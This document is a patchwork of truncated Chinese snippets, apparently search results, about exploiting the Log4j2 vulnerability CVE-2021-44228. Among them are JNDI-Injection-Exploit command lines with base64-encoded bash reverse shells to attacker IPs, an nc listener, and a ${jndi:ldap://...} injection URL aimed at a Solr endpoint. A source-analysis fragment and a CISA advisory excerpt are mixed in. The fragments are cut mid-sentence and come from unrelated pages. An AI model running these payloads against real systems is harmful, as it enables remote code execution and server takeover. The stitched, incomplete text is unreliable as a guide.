就是这么一个逻辑,根据要执行的cmd命令生成一个随机类名,然后使用ASM来直接生成一份包含了Runtime.getRuntime().exec()这个方法,exec方法的参数就是cmd中的内容。 OK,对我们学习该漏洞帮助的JNDIExploit这个项目差不多就这么多了。可能这个老哥考虑的东西比较多(可能是想写的更加灵活一点),所以加了个HttpServer来...
直接使用工具 java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo, YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjAuMTA2LzEyMzUgMD4mMQ==}|{base64,-d}|{bash,-i}" -A 192.168.0.106 这里红色处就是你加密之后的值,最后面的IP还是kali的IP,回车启动 这里会生成两个协议各一个执...
Log4j2(CVE-2021-44228)漏洞造成是因为 通过MessagePatternConverter类进入他的format函数入口后需匹配判断是否存在${,若存在进入if后的workingBuilder.append(config.getStrSubstitutor().replace(event, value));,最终走到了lookup函数进行jndi注入。 那么我们待会分析就从MessagePatternConverter的format函数开始剖析源码。
这里需要JNDI注入利用工具,生成JNDI链接并启动后端相关服务,可用于Fastjson、Jackson等相关漏洞的验证。 java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzQuMTM3LjU4LjYvODg4OCAwPiYx}|{base64,-d}|{bash,-i}" -A 174.137.58.6 在自己的VPS上监...
使用到第一步搭建好的 JNDI-Injection-Exploit 在JNDI-Injection-Exploit目录下执行 代码语言:javascript 代码运行次数:0 运行 AI代码解释 java-jar target/JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar-C"bash -c {echo,[经过base64编码后的命令]}|{base64,-d}|bash"-A[你的vpsip] ...
Exploitability score 8.6 Vector string AV:N/AC:M/Au:N/C:C/I:C/A:C Known exploits Data from CISA Vulnerability name Apache Log4j2 Remote Code Execution Vulnerability Exploit added on Dec 10, 2021 Exploit action due Dec 24, 2021 Required action For all affected software assets for which upd...
另外,高级威胁的职业玩家可以借着CVE-2021-44228这类由众多玩家(包括脚本小子在内)参与的exploit-in-the-wild的攻击作为掩护,进而针对高价值目标进行定向打击。 是否应该抱怨开源维护者?开源基金会是否是唯一解决方案? OpenSSL的心脏出血后Linux基金会成立了CII基础架构联盟以解决开源基础架构的安全生态问题,但其结果不...
【摘要】 Log4j远程代码执行漏洞(CVE-2021-44228) 漏洞复现 01 漏洞描述 Apache Log4j是Apache的一个开源项目,Apache log4j2是Log4j的升级版本,我们可以控制日志信息输送的目的地为控制台、文件、GUI组件等,通过定义每一条日志信息的级别,能够更加细致地控制日志的生成过程。
应用工具JNDI-Injection-Exploit搭建服务:格式: java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C “命令” -A “ip(攻击机)” 这里的命令是想要靶机运行的命令,-A后放的是发出攻击的电脑的ip,也是存放-C后“命令”的ip地址。接下来要实现反弹shell,可以用命令...
首先在中转机上使用JNDIExploit-1.2-SNAPSHOT.jar文件使用java启动,命令如下: java -jar JNDIExploit-1.2-SNAPSHOT.jar -i 172.16.7.78 然后在攻击机上开启监听:nc -lvvp 1234 此时构造如下命令: http://172.16.7.155:8983/solr/admin/cores?_=1652063831386&wt=json&indexInfo=${jndi:ldap://172.16.7.78:1389...